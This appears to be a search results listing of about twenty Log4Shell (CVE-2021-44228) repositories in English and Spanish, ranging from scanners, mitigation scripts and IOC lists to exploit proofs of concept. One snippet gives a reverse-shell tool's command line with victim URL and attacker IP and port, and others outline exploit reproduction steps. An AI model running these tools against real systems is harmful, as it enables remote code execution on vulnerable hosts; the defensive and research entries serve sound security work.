906 matches found
log4j-CVE-2021-44228
Apache Log4j Día Cero aka Log4Shell aka CVE-2021-44228 Introducción Reproduciendo el problema en entorno k8s Configurando el entorno k8s con la vulnerabilidad Posibles Soluciones Política de Seguridad de KubeArmor No permitir ejecuciones desde JVM/Java Reglas basadas en denegación por defecto...
Log4j2-CVE-2021-44228-revshell
Log4j2-CVE-2021-44228-revshell Uso root@kitploit: Para reverse shell: $ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l AttackerIP -p AttackerPort -hp HTTPServerPort Para comprobar si es explotable: $ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -...
log4j
CVE-2021-44228 a.k.a. LOG4J This is a public repository from Wortell containing information, links, files and other items related to vulnerabilities related to Log4j Due to vulnerabilities in log4j 2.17.0 it is now recommended to patch to version 2.17.1 Knows CVEs CVE| Score| Description...
log4j-scanner-CVE-2021-44228
log4j-scanner CVE-2021-44228 Simple tool for scanning entire directories for attempts of CVE-2021-44228 there are always ways to bypass filters , same goes for the regex patterns...
CVE-2021-44228_Log4Shell
CVE-2021-44228Log4Shell Test source code for Log4ShellCVE-2021-44228. Step Information 1. Install JDK8 8u191 in virtual machineWindows 10. 2. Copy out\artifacts\POCjar\POC.jar in Windows. 3. Copy JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar in Windows, Get JNDI-Injection-Exploit 4. Run java -jar...
Log4j2-CVE-2021-44228
CVE-2021-44228 Remote Code Injection In Log4j https://twitter.com/jas502n/status/1468946197629272066 SpringBoot-pom.xml default use : xml org.springframework.boot spring-boot-starter-web root@kitploit: mvn dependency:treejava INFO | | +-...
CVE-2021-44228-Test-Server
CVE-2021-44228-Test-Server A small server for verifing if a given java program is succeptibel to CVE-2021-44228 Usage Build the program using go build -o listener.exe. This should give you a small executable for your platform. Use the Go cross compile feature if you need the executable for anothe...
log4shell-finder
log4shell-finder - Fastest file system scanner for log4j instances Python port of https://github.com/mergebase/log4j-detector log4j-detector is copyright C Copyright 2021 Mergebase Software Inc. https://mergebase.com/ Licensed via GPLv3. Motivation for porting to Python was to improve perfomance,...
Log4j-Rec-CVE-2021-44228
Log4j2 Replication Notes, For Learning Only Reference: https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce Create Executable File root@kitploit: com/example/template javac Log4jRCE.java Start Python Built-in HTTP Server root@kitploit: com/example/template python -m http.server 8888...
Ox4Shell
Ox4Shell Desofusca cargas útiles de Log4Shell con facilidad. Descripción Desde el lanzamiento de la vulnerabilidad Log4Shell CVE-2021-44228, se crearon muchas herramientas para ofuscar cargas útiles de Log4Shell, haciendo la vida de los ingenieros de seguridad una pesadilla. Esta herramienta...
log4shell_ioc_ips
j4shelliocips gran volcado de direcciones IP maliciosas conocidas de log4j/log4shell, únicas y ordenadas, se actualiza una vez por hora solo si hay cambios! CVE-2021-44228 buena cacería disclaimer Este script analiza muchas fuentes, por lo que esta lista puede tener muchos falsos positivos. ¡No...
ansible-role-log4shell
lucab85.ansiblerolelog4shell Ansible role to scan target Linux hosts using the official Red Hat Log4j detector script RHSB-2021-009 for Log4Shell CVE-2021-44228. Tested with Red Hat version 1.3 detector 2022-01-10. Ansible Playbook Code also available as Ansible Playbook...
Log4jShell-Scan
Overview log4j2 RCE vulnerability CVE-2021-44228 intranet scanner, can be used for vulnerability scanning under the condition of no internet access, helping enterprises quickly discover Log4Shell vulnerabilities. Modified from: https://github.com/fullhunt/log4j-scan JNDIMonitor from:...
vcenter-log4j
Solución para VMware vCenter log4j Script para solucionar la vulnerabilidad log4j de VMware vCenter CVE-2021-44228, según el artículo de KB de VMware. 2021-12-13 02:09 UTC - Añadido servicios de Token Seguro y Gestión de Identidad 2021-12-13 12:46 UTC - Añadido PSC Client para 6.5 - ver abajo...
tf-log4j-aws-poc
Readme Project Description This project files demostrate a proof-of-concept of log4j vulnerability CVE-2021-44228 on AWS using Terraform Infrastructure-as-a-code means. There are 2 demo in this project: 1. single-instance contains a vulnerable server, you can use your personal computer to exploit...
f-for-java
f-for-java a project written in go and java i abandoned for CVE-2021-44228 try to fix it if you can XD THE MODULE IN JAVA IS NOT MINE...
log4j-shell-csw
Log4j Simple Exploit A Proof-Of-Concept Exploit for CVE-2021-44228 vulnerability. Log4j, which is used to log security and performance information, impacts upwards of 3 billion devices that use Java across a variety of consumer and enterprise services, websites and applications, as well as medica...
log4shell4shell
log4shell4shell Log4j - Multitool. Find & fix possible CVE-2021-44228 vulneraries - provides a complete LOG4SHELL test/attack environment Features Check your Linux/Mac/BSD and Windows System for CVE-2021-44228 vulneraries Fix your system by deleting log4j java class / or setting some enviroment...
log4j-test
Simple Example showing CVE-2021-44228 in action Explanation To reproduce this issue, I am removing the transitive dependency for logging from SpringBoot. Instead, I am bringing in spring-boot-starter-log4j2 spring-boot-starter-log4j2 brings in log4j-core which has the remote code exploit RCE...
Log4Shell-CVE-2021-44228-ENV
Log4Shell Reproduction Environment Example Description Victim machine IP: 47.47.47.47 Attacker machine IP: 48.48.48.48 Running the Vulnerable Docker on the Victim Machine Use the DockerFile to build the docker image and run: root@kitploit: docker build . -t vuln docker run -p 8080:8080 --name vul...